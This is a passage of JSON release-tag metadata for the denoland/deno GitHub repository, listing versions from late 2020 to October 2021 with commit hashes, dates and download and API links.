28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d5